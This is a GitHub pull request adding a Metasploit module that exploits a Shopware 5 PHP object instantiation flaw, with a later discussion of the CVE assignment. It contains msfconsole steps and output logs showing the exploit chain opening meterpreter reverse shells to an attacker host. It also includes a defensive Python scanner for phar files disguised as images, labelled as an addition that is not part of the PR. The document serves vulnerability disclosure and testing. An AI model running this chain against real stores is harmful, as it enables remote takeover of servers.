
Added CVE-2017 18357 - Shopware createInstanceFromNamedArguments PHP Object Instantiation #11828

Merged
merged 19 commits into from
May 17, 2019

Conversation

stevenseeley
Contributor

@stevenseeley stevenseeley commented May 9, 2019

Background

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework, Shopware comes as the perfect platform for your next e-commerce project. Furthermore, Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform.

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6 (currently the latest), 5.5, 5.4, 5.3.

References

Notes

  • I don't consider this a zero-day because it's a bypass for a patch
  • I recommend the CVSS score to be 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

Setup

The following is the exact setup I used to test and analyze the vulnerability:

  • Debian GNU/Linux 9 (stretch) x64
  • MariaDB latest
  • Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo

For installation instructions, please refer to the Shopware installation guide.

Verification

  • Install Shopware as noted above
  • Install the Metasploit module
  • Start msfconsole
  • use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
  • set payload php/meterpreter/reverse_tcp
  • set LHOST x.x.x.x
  • set RHOSTS y.y.y.y
  • check
  • exploit
  • Verify that you get a meterpreter session

Example

saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
[*] Processing scripts/shopware.rc for ERB directives.
resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (scripts/shopware.rc)> set LHOST 192.168.23.1
LHOST => 192.168.23.1
resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
RHOSTS => 192.168.23.164
resource (scripts/shopware.rc)> set RPORT 8080
RPORT => 8080
resource (scripts/shopware.rc)> check
[+] 192.168.23.164:8080 - The target is vulnerable.
resource (scripts/shopware.rc)> exploit
[*] Started reverse TCP handler on 192.168.23.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
[+] Stage 2 - leaked the webroot: /var/www/html
[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 192.168.23.174
[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
[+] Deleted rguktpcw.php
[+] Deleted image/6b/7e/0c/eiuzuoii.jpg

meterpreter > sysinfo
Computer    : 45835d649528
OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
Meterpreter : php/linux
meterpreter >
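A defender's check for the on-disk artefacts this chain leaves behind (a phar stored under an image extension in media/image, and a PHP file dropped directly under media/), written as an added example that is not part of this PR or of the Metasploit module. The directory layout and file contents below are constructed stand-ins, and the scanner assumes it is pointed at a Shopware media directory.

```python
import os
import tempfile

# Every phar archive must end its stub with this call, whatever extension the
# file is stored under; a polyglot can carry valid image magic bytes in front
# of it, so an extension/magic check alone is not enough.
PHAR_STUB_MARKER = b"__HALT_COMPILER"
IMAGE_MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
               ".png": b"\x89PNG", ".gif": b"GIF8"}
PHP_EXTENSIONS = {".php", ".phtml", ".phar"}

def scan_media_dir(root):
    """Walk a Shopware-style media tree and return sorted (relpath, reason) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                head = fh.read(4096)  # the stub sits at the start of a phar
            if ext in PHP_EXTENSIONS:
                findings.append((rel, "executable PHP file inside media tree"))
                continue
            if ext in IMAGE_MAGIC and not head.startswith(IMAGE_MAGIC[ext]):
                findings.append((rel, "extension does not match file magic"))
            if PHAR_STUB_MARKER in head:
                findings.append((rel, "phar stub marker inside an image file"))
    return sorted(findings)

def build_sample_tree():
    """Create a constructed media tree modelled on the artefacts in the PR output."""
    root = tempfile.mkdtemp(prefix="shopware_media_")
    img_dir = os.path.join(root, "image", "6b", "7e", "0c")
    os.makedirs(img_dir)
    # benign upload: JPEG magic followed by filler
    with open(os.path.join(img_dir, "product.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    # constructed stand-in for a phar stored as .jpg: valid magic, then a stub
    with open(os.path.join(img_dir, "eiuzuoii.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0<?php __HALT_COMPILER(); ?>\r\n" + b"\x00" * 64)
    # constructed stand-in for a PHP file dropped directly under media/
    with open(os.path.join(root, "rguktpcw.php"), "wb") as fh:
        fh.write(b"<?php /* placeholder, no payload */ ?>")
    return root

if __name__ == "__main__":
    for rel, reason in scan_media_dir(build_sample_tree()):
        print(f"{rel}: {reason}")
```

The magic-byte check alone passes the disguised phar, which is why the stub marker is searched regardless of extension.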

@wchen-r7 wchen-r7 self-assigned this May 10, 2019
@wchen-r7
Contributor

Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !

@stevenseeley
Contributor Author

> Hi, just a heads up. I'm having issues with my laptop after the Mojave upgrade, it may take a few days for me to be able to start testing this PR again. Thanks for waiting @stevenseeley !

duuuuuude, of course, take your time!

@wchen-r7
Contributor

wchen-r7 commented May 17, 2019

I ran into a little trouble due to a bug but the exploit has been confirmed:

msf5 exploit(multi/http/shopware_createinstancefromnamedarguments_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=1622223ihnauhu7tr6rvo77v1v;
[+] Stage 2 - leaked the web root: /var/www/html/shopware/
[+] Stage 3 - leaked the CSRF token: R5Wl0s547aP33xYEKGeW9BGYH5FVnV
[*] /var/www/html/shopware/media/xyefxbyu.php
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6c/48/67/zkvlolae.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:53290) at 2019-05-17 18:12:47 -0500

meterpreter > 

I can fix that bug and then land it. Thank you for the patience @stevenseeley. Always happy to see your work!

@wchen-r7
Contributor

Ok now this output is better:

msf5 exploit(multi/http/shopware_createinstancefromnamedarguments_rce) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=d66oftua6p29p6gt7pma494vbj;
[+] Stage 2 - leaked the web root: /var/www/html/shopware/
[+] Stage 3 - leaked the CSRF token: sSbbewFwfJxeCHL4JHdoqrwb88ku0w
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/5d/b2/5c/okwnopws.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 172.16.135.129
[*] Meterpreter session 2 opened (172.16.135.1:4444 -> 172.16.135.129:53296) at 2019-05-17 18:19:06 -0500
[+] Deleted hjqrkulj.php
[+] Deleted image/5d/b2/5c/okwnopws.jpg

meterpreter > 

Nothing major, it's just I had to make sure the php payload path is normalized:

php = Rex::FileUtils.normalize_unix_path("#{webroot}#{target_uri.path}media/#{@shll_bd}.php")

Landing now!

@wchen-r7 wchen-r7 merged commit 1df703b into rapid7:master May 17, 2019
@wchen-r7
Contributor

Release Notes

Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework, Shopware comes as the perfect platform for your next e-commerce project. Furthermore, Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform.

In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by @KarimOuerghemmi of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.

@stevenseeley stevenseeley deleted the CVE-2017-18357 branch May 17, 2019 23:45
@todb-r7

todb-r7 commented May 22, 2019

> This vulnerability is a bypass for CVE-2017-18357

So, I had a conversation with some MITRE & CERT folks about this bug, and the consensus landed on that this does seem to describe a new vulnerability after all. Looking at rule CNT1, it's an independently fixable issue, so it looks like the old vuln and this new vuln are, from CVE's perspective, two different vulnerabilities (even though they end up hitting the same codepath). Practically speaking, someone looking at Shopware CVEs from a vuln management perspective may not know that the old patch is insufficient unless and until there's a new CVE that specifically points that out.

I'll take on wrangling that new CVE for @stevenseeley .

@gdavidson-r7 gdavidson-r7 added the rn-modules release notes for new or majorly enhanced modules label May 29, 2019
@stevenseeley
Contributor Author

CVE-2019-12799

todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Sep 12, 2019
In PR rapid7#11828, the module author requested, and got, a new CVE for this
issue. The module should reflect that.